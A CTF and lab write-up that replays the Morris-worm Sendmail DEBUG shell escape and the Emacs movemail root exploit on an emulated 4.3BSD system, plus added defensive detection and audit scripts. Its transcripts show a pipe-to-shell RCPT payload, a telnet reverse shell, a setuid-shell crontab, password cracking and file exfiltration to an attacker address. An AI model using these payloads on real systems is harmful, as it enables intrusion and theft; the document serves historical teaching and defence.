
Mailing shell commands to Sendmail
The venerable Sendmail has a debug mode for verifying that mail reaches its intended destination. Part of that implementation is a shell escape, which can be used to run arbitrary commands. Since the commands become part of the mail message, the headers must be stripped so that the code executes cleanly.
We can use ncat to speak SMTP by hand and get some insight into what happens. sed(1) is used to clean up the mail message.
wvu@kharak:~$ ncat -v 127.0.0.1 25
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:25.
220 simh Sendmail 5.51/5.17 ready at Wed, 18 Dec 85 11:14:07 PST
DEBUG
200 Debug set
MAIL FROM:<test>
queuename: assigned id AA00153, env=17934
setsender(<test>)
--parseaddr(<test>)
parseaddr-->17948=<test>: mailer 0 (local), host `', user `test'
        next=0, flags=0, alias 0
        home="", fullname=""
250 <test>... Sender ok
RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
--parseaddr(<"| sed '1,/^$/d' | sh; exit 0">)
parseaddr-->2c980=<"| sed '1,/^$/d' | sh; exit 0">: mailer 0 (local), host `', user `"| sed '1,/^$/d' | sh; exit 0"'
        next=0, flags=0, alias 0
        home="", fullname=""
recipient: 2c980=<"| sed '1,/^$/d' | sh; exit 0">: mailer 0 (local), host `', user `"| sed '1,/^$/d' | sh; exit 0"'
        next=0, flags=10, alias 0
        home="", fullname=""
250 <"| sed '1,/^$/d' | sh; exit 0">... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
PATH=/bin:/usr/bin:/usr/ucb:/etc
export PATH
sleep 60
.
EOH
----- collected header -----
Return-Path: <g>
Received: ?sfrom s .by j (v/Z)
        id i; b
Resent-Date: a
Date: a
Resent-From: q
From: q
Full-Name: x
Subject:
Resent-Message-Id: <t.i@j>
Message-Id: <t.i@j>
----------------------------
SENDALL: mode b, sendqueue:
2c980=<"| sed '1,/^$/d' | sh; exit 0">: mailer 1 (prog), host `', user `| sed '1,/^$/d' | sh; exit 0"'
        next=0, flags=10, alias 0
        home="", fullname=""
recipient: 17948=<test>: mailer 0 (local), host `', user `test'
        next=0, flags=1, alias 0
        home="/", fullname=""
queueing AA00153
queueing 2c980=<"| sed '1,/^$/d' | sh; exit 0">: mailer 1 (prog), host `', user `| sed '1,/^$/d' | sh; exit 0"'
        next=17948, flags=10, alias 0
        home="", fullname=""
250 Ok
<"| sed '1,/^$/d' | sh; exit 0">: mailer 1 (prog), host `', user `| sed '1,/^$/d' | sh; exit 0"'
        next=17948, flags=10, alias 0
        home="", fullname=""
disconnect: In 7 Out 6
<"| sed '1,/^$/d' | sh; exit 0">: mailer 1 (prog), host `', user `| sed '1,/^$/d' | sh; exit 0"'
        next=17948, flags=10, alias 0
        home="", fullname=""
====finis: stat 0 e_flags 1
dropenvelope 17934 id=<null> flags=1
QUIT
221 simh closing connection
====finis: stat 0 e_flags 1
dropenvelope 17934 id="AA00152" flags=1
^C
wvu@kharak:~$
We can inspect the spool files generated in the mail queue and verify that the shell command is being executed.
simh# cd /usr/spool/mqueue
simh# ls -la
total 6
drwxrwxrwt  2 root      512 Dec 18 11:14 ./
drwxr-xr-x 10 root      512 Dec 18 10:36 ../
-rw-------  1 root       55 Dec 18 11:14 dfAA00153
-rw-------  1 root        0 Dec 18 11:14 lfAA00153
-rw-------  1 root      326 Dec 18 11:14 qfAA00153
-rw-r--r--  1 daemon    157 Dec 18 11:15 syslog
-rw-r--r--  1 daemon      0 Sep 27  1983 syslog.0
-rw-r--r--  1 daemon      0 Sep 27  1983 syslog.1
-rw-r--r--  1 daemon      0 Sep 27  1983 syslog.2
-rw-r--r--  1 daemon      0 Sep 27  1983 syslog.3
-rw-r--r--  1 daemon      0 Sep 27  1983 syslog.4
-rw-r--r--  1 daemon      0 Sep 27  1983 syslog.5
-rw-r--r--  1 daemon      0 Sep 27  1983 syslog.6
-rw-r--r--  1 daemon      0 Sep 27  1983 syslog.7
-rw-r--r--  1 root      329 Dec 18 11:15 xfAA00153
simh# cat dfAA00153
PATH=/bin:/usr/bin:/usr/ucb:/etc
export PATH
sleep 60
simh# ps auxww | grep '^daemon'
daemon     159  0.0  0.2    9    7 ?  I     0:00 sleep 60
daemon     158  0.0  0.3   27   12 ?  I     0:00 sh
daemon     156  0.0  0.3   27   12 ?  I     0:00 sh -c sed '1,/^$/d' | sh; exit 0
simh#
Our sleep 60 command was handed to /bin/sh, and the spool file contains no mail headers because sed stripped them. Cool!
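As an added example (not code from the post or from the Metasploit module it describes), here is a small Python check a defender could run over captured SMTP client commands: it flags the DEBUG command and any RCPT TO whose local part is a program-mailer pipe, the two ingredients used in the session above. The two transcripts embedded in the block are constructed for the example.

```python
import re

# Constructed transcripts of SMTP client commands (not captures from the post).
SUSPICIOUS_SESSION = """\
DEBUG
MAIL FROM:<test>
RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
DATA
QUIT
"""
BENIGN_SESSION = """\
HELO relay.example.test
MAIL FROM:<alice@example.test>
RCPT TO:<bob@example.test>
DATA
QUIT
"""

RCPT_RE = re.compile(r'^RCPT\s+TO:\s*<(.*)>\s*$', re.IGNORECASE)


def recipient_is_pipe(addr: str) -> bool:
    """True when the local part starts with '|', i.e. the address would be
    routed to the prog mailer and handed to /bin/sh (quoted local parts are
    unquoted first, as in the RCPT TO above)."""
    local = addr.rsplit('@', 1)[0].strip()
    if len(local) >= 2 and local[0] == '"' and local[-1] == '"':
        local = local[1:-1]
    return local.lstrip().startswith('|')


def analyze_session(transcript: str) -> dict:
    """Scan one client transcript and report the DEBUG command and any pipe
    recipients; either one arriving over the network is worth an alert."""
    findings = {'debug': False, 'pipe_rcpts': []}
    for line in transcript.splitlines():
        cmd = line.strip()
        if cmd.upper() == 'DEBUG':
            findings['debug'] = True
            continue
        m = RCPT_RE.match(cmd)
        if m and recipient_is_pipe(m.group(1)):
            findings['pipe_rcpts'].append(m.group(1))
    findings['alert'] = findings['debug'] or bool(findings['pipe_rcpts'])
    return findings


if __name__ == '__main__':
    for name, session in (('suspicious', SUSPICIOUS_SESSION),
                          ('benign', BENIGN_SESSION)):
        print(name, analyze_session(session))
```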
Emacs movemail exploit from 'The Cuckoo's Egg'
The hacker in the book used this to root the boxes he had shelled. Although the events of the book took place on 4.2BSD, we can do the same thing on 4.3, since I have imported the Emacs source into the /usr/src/contrib tree.
Let's perform the attack, but with our own vector, one that doesn't clobber atrun(8).
Preparing a SUID-root movemail
simh# cd /usr/src/contrib/emacs/etc
simh# make movemail
cc -o movemail -g movemail.c
simh# cp movemail /etc
simh# chmod 4755 /etc/movemail
simh# ls -l /etc/movemail
-rwsr-xr-x  1 root      15360 Dec 18 11:20 /etc/movemail*
simh#
Exploiting movemail via crontab.local
whoami
nobody
(umask 0 && /etc/movemail /dev/null /usr/lib/crontab.local)
ls -l /usr/lib/crontab.local
-rw-rw-rw-  1 root            0 Dec 18 11:22 /usr/lib/crontab.local
(echo "* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh"; echo "* * * * * root rm -f /usr/lib/crontab.local") > /usr/lib/crontab.local
cat /usr/lib/crontab.local
* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
* * * * * root rm -f /usr/lib/crontab.local
ls -l /tmp/sh
-rwsr-xr-x  1 root        23552 Dec 18 11:22 /tmp/sh
/tmp/sh
whoami
root
ls -l /usr/lib/crontab.local
/usr/lib/crontab.local not found
Feel free to read the module and its documentation for more details. With an arbitrary write as root, there are plenty of other vectors for escalating to root; the auxiliary crontab(5) seemed the most straightforward to me.
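As an added example (not the post's or the Metasploit module's code), a Python audit of the two preconditions the vector above depends on: a setuid-root movemail that non-owners can run, and a /usr/lib/crontab.local that is writable by others or not owned by root. The movemail locations checked are the ones the post used and are assumptions; the checks take raw mode and uid values so they can be exercised without a 4.3BSD host.

```python
import os
import stat

# crontab.local path is from the post; the movemail locations are assumed.
CRONTAB_LOCAL = '/usr/lib/crontab.local'
MOVEMAIL_CANDIDATES = ('/etc/movemail', '/usr/guest/hunter/movemail')


def crontab_issues(mode: int, uid: int) -> list:
    """Why a crontab.local with this st_mode/st_uid lets an unprivileged user
    schedule root jobs: the post created it world-writable with umask 0."""
    issues = []
    if uid != 0:
        issues.append('not owned by root')
    if mode & stat.S_IWGRP:
        issues.append('group-writable')
    if mode & stat.S_IWOTH:
        issues.append('world-writable')
    return issues


def movemail_issues(mode: int, uid: int) -> list:
    """A setuid-root movemail that other users can execute hands them a
    root-owned file-create primitive; -rws--x--x is just as bad as 4755."""
    issues = []
    if uid == 0 and mode & stat.S_ISUID:
        issues.append('setuid root')
        if mode & (stat.S_IXGRP | stat.S_IXOTH):
            issues.append('executable by non-owners')
    return issues


def audit(paths=(CRONTAB_LOCAL,) + MOVEMAIL_CANDIDATES) -> dict:
    """Stat each existing path and return {path: issues}; missing files are
    skipped, since an absent crontab.local is the safe state."""
    report = {}
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue
        check = crontab_issues if path == CRONTAB_LOCAL else movemail_issues
        issues = check(st.st_mode, st.st_uid)
        if issues:
            report[path] = issues
    return report


if __name__ == '__main__':
    for path, issues in audit().items():
        print(f'{path}: {", ".join(issues)}')
```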
Bonus: 2 of Diamonds solution (SPOILERS)
This is more of an intended solution than a writeup. The Easter eggs are references to 'The Cuckoo's Egg'.
msf5 > use exploit/unix/smtp/morris_sendmail_debug
msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(unix/smtp/morris_sendmail_debug) > run

[*] Started reverse TCP double handler on 192.168.1.3:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Sending: MAIL FROM:<OL6ueX3yw5TVFnOp8svQqcYCTE>
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4387|telnet 192.168.1.3 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.3 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Sending: QUIT
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo YFSyo34voEAHn2Nx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: ": Trying...: not found\r\nsh: Connected: not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.3:49389) at 2018-12-18 13:30:42 -0600
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

whoami
daemon
grep hunter /etc/passwd
hunter:IE4EHKRqf6Wvo:32765:31:Hunter Hedges:/usr/guest/hunter:/bin/sh
cat /usr/spool/mail/hunter
From cliff Wed Sep 10 12:34:42 1986
Received: by 2-of-diamonds (5.51/5.17)
        id AA00579; Wed, 10 Sep 86 12:34:42 PDT
Date: Wed, 10 Sep 86 12:34:42 PDT
From: cliff (Cliff Stoll)
Message-Id: <8610210434.AA00579@2-of-diamonds>
To: mcnatt@26.0.0.113
Subject: What do you know about the nesting habits of cuckoos?
Status: RO

He went looking for your Gnu-Emacs move-mail file.
"What do you know about the nesting habits of cuckoos?" I explained how the Gnu-Emacs security hole worked.
wvu@kharak:~$ hashcat -ia 3 -m 1500 --force IE4EHKRqf6Wvo ?l?l?l?l?l?l?l?l
[snip]
IE4EHKRqf6Wvo:msfhack

Session..........: hashcat
Status...........: Cracked
Hash.Type........: descrypt, DES (Unix), Traditional DES
Hash.Target......: IE4EHKRqf6Wvo
Time.Started.....: Tue Dec 18 13:33:17 2018 (57 secs)
Time.Estimated...: Tue Dec 18 13:34:14 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?l?l [7]
Guess.Queue......: 7/8 (87.50%)
Speed.Dev.#2.....: 14603.0 kH/s (823.72ms) @ Accel:1 Loops:1024 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 836665344/8031810176 (10.42%)
Rejected.........: 0/836665344 (0.00%)
Restore.Point....: 36864/456976 (8.07%)
Candidates.#2....: rywwfou -> vkvcfnd

Started: Tue Dec 18 13:31:50 2018
Stopped: Tue Dec 18 13:34:15 2018
wvu@kharak:~$
The hacker evidently didn't like his old passwords - hedges, jaeger, hunter, and benson. One by one, he replaced them with a new password, lblhack.
su - hunter
Password:msfhack
ls -la
total 18
drwx------  2 hunter      512 Nov  6 18:19 .
drwxr-xr-x  7 root        512 Nov  6 18:19 ..
-rw-------  1 hunter       13 Nov  6 18:19 .history
-rws--x--x  1 root      15360 Nov  6 18:19 movemail
cat .history
who
ps -eafg
Yet the intruder typed ps -eafg. Strange. I had never seen anyone use the g flag.
msf5 exploit(unix/smtp/morris_sendmail_debug) > use exploit/unix/local/emacs_movemail
msf5 exploit(unix/local/emacs_movemail) > set session -1
session => -1
msf5 exploit(unix/local/emacs_movemail) > set movemail /usr/guest/hunter/movemail
movemail => /usr/guest/hunter/movemail
msf5 exploit(unix/local/emacs_movemail) > set verbose true
verbose => true
msf5 exploit(unix/local/emacs_movemail) > run

[*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
[*] Current shell is /bin/sh
[*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
[+] SUID-root /usr/guest/hunter/movemail found
[*] Preparing crontab with payload
* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
* * * * * root rm -f /usr/lib/crontab.local
[*] Creating writable /usr/lib/crontab.local
[+] Writing crontab to /usr/lib/crontab.local
[!] Please wait at least one minute for effect
[*] Exploit completed, but no session was created.
msf5 exploit(unix/local/emacs_movemail) > sessions -1
[*] Starting interaction with 1...

ls -l /tmp/sh
-rwsr-xr-x  1 root        23552 Dec 18 11:36 /tmp/sh
/tmp/sh
whoami
root
/usr/games/adventure
Welcome to adventure!!  Would you like instructions?
no
You are standing at the end of a road before a small brick building.
Around you is a forest.  A small stream flows out of the building and
down a gully.
enter building
You are inside a building, a well house for a large spring.
There are some keys on the ground here.
There is a shiny brass lamp nearby.
There is food here.
There is a bottle of water here.
take keys
OK
take lamp
OK
leave
You're at end of road again.
go south
You are in a valley in the forest beside a stream tumbling along a
rocky bed.
go south
At your feet all the water of the stream splashes into a 2-inch slit
in the rock.  Downstream the streambed is bare rock.
go south
You are in a 20-foot depression floored with bare dirt.  Set into the
dirt is a strong steel grate mounted in concrete.  A dry streambed
leads into the depression.
The grate is locked.
unlock grate
The grate is now unlocked.
enter
You are in a small chamber beneath a 3x3 steel grate to the surface.
A low crawl over cobbles leads inward to the west.
The grate is open.
go west
You are crawling over cobbles in a low passage.  There is a dim light
at the east end of the passage.
There is a small wicker cage discarded nearby.
take cage
OK
go west
It is now pitch dark.  If you proceed you will likely fall into a pit.
light lamp
Your lamp is now on.
You are in a debris room filled with stuff washed in from the surface.
A low wide passage with cobbles becomes plugged with mud and debris
here, but an awkward canyon leads upward and west.  A note on the wall
says "magic word xyzzy".
A three foot black rod with a rusty star on an end lies nearby.
go west
You are in an awkward sloping east/west canyon.
go west
You are in a splendid chamber thirty feet high.  The walls are frozen
rivers of orange stone.  An awkward canyon and a good passage exit
From east and west sides of the chamber.
A cheerful little bird is sitting here singing.
catch bird
OK
go west
At your feet is a small pit breathing traces of white mist.  An east
passage ends here except for a small crack leading on.
Rough stone steps lead down the pit.
go down
You are at one end of a vast hall stretching forward out of sight to
the west.  There are openings to either side.  Nearby, a wide stone
staircase leads downward.  The hall is filled with wisps of white mist
swaying to and fro almost as if alive.  A cold wind blows up the
staircase.  There is a passage at the top of a dome behind you.
Rough stone steps lead up the dome.
go down
You are in the hall of the mountain king, with passages off in all
directions.
A huge green fierce snake bars the way!
release bird
The little bird attacks the green snake, and in an astounding flurry
drives the snake away.
go sw
You are in a secret canyon which here runs e/w.  It crosses over a
very tight canyon 15 feet below.  If you go down you may not be able
to get back up.
go west
You are in a secret canyon which exits to the north and east.
A huge green fierce dragon bars the way!
The dragon is sprawled out on a persian rug!!
kill dragon
With what?  Your bare hands?
yes
Congratulations!  You have just vanquished a dragon with your bare
Hands!  (unbelievable, isn't it?)
You are in a secret canyon which exits to the north and east.
There is a persian rug spread out on the floor!
The body of a huge green dead dragon is lying off to one side.
There is a flag here.
take flag
OK
inventory
You are currently holding the following:
Set of keys
Brass lantern
Wicker cage
2 of Diamonds
go east
A little dwarf just walked around a corner, saw you, threw a little
axe at you which missed, cursed, and ran away.
You're in secret e/w canyon above tight canyon.
There is a little axe here.
take axe
OK
go east
There is a threatening little dwarf in the room with you!
One sharp nasty knife is thrown at you!
It misses!
You're in hall of mt king.
A cheerful little bird is sitting here singing.
throw axe at dwarf
You killed a little dwarf.  The body vanishes in a cloud of greasy
black smoke.
You're in hall of mt king.
There is a little axe here.
A cheerful little bird is sitting here singing.
go up
You're in hall of mists.
Rough stone steps lead up the dome.
go up
You're at top of small pit.
Rough stone steps lead down the pit.
go east
You're in bird chamber.
go east
You are in an awkward sloping east/west canyon.
go east
You're in debris room.
A three foot black rod with a rusty star on an end lies nearby.
xyzzy
You're inside building.
There is food here.
There is a bottle of water here.
drop flag
Congratulations!  You have completed the 2 of Diamonds challenge.
The crypt(1) password for 2_of_diamonds.dat is `wyvern'.
A large cloud of green smoke appears in front of you.  It clears away
to reveal a tall wizard, clothed in grey.  He fixes you with a steely
glare and declares, "this adventure has lasted too long."  With that
he makes a single pass over you with his hands, and everything around
You fades away into a grey nothingness.
You scored 65 out of a possible 366 using 36 turns.
Your score qualifies you as a novice class adventurer.
To achieve the next higher rating, you need 36 more points.
crypt wyvern < /usr/games/lib/2_of_diamonds.dat | uuencode 2_of_diamonds.png | telnet 192.168.1.3 4444
Trying...
Connected to 192.168.1.3.
Escape character is '^]'.
Connection closed by foreign host.
An outsider would never guess our secret password, "wyvern" - when guessing a password, how many people would think of a mythical winged dragon?
wvu@kharak:~$ ncat -lv 4444 | uudecode
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.1.3.
Ncat: Connection from 192.168.1.3:49444.
write: Broken pipe
wvu@kharak:~$ ls -l 2_of_diamonds.png
----------  1 wvu  2075806812  131776 Dec 18 13:44 2_of_diamonds.png
wvu@kharak:~$ chmod 644 2_of_diamonds.png
wvu@kharak:~$ file 2_of_diamonds.png
2_of_diamonds.png: PNG image data, 500 x 700, 8-bit/color RGBA, non-interlaced
wvu@kharak:~$ pngcheck -cv 2_of_diamonds.png
File: 2_of_diamonds.png (131776 bytes)
  chunk IHDR at offset 0x0000c, length 13
    500 x 700 image, 32-bit RGB+alpha, non-interlaced
  chunk pHYs at offset 0x00025, length 9: 2835x2835 pixels/meter (72 dpi)
  chunk sRGB at offset 0x0003a, length 1
    rendering intent = perceptual
  chunk gAMA at offset 0x00047, length 4: 0.45455
  chunk IDAT at offset 0x00057, length 131669
    zlib: deflated, 32K window, superfast compression
  chunk IEND at offset 0x202b8, length 0
No errors detected in 2_of_diamonds.png (6 chunks, 90.6% compression).
wvu@kharak:~$ md5 2_of_diamonds.png
MD5 (2_of_diamonds.png) = 46ff82c72e7491a451fef2e335dcb912
wvu@kharak:~$
30 years later, the worm has turned
I hope you enjoyed this trip down memory lane, with a bit of binary exploitation and shell trickery thrown in. Hopefully you were able to play along as well. While the system and its software may not be relevant today, most of the same technical skills still are, especially for those new to the field.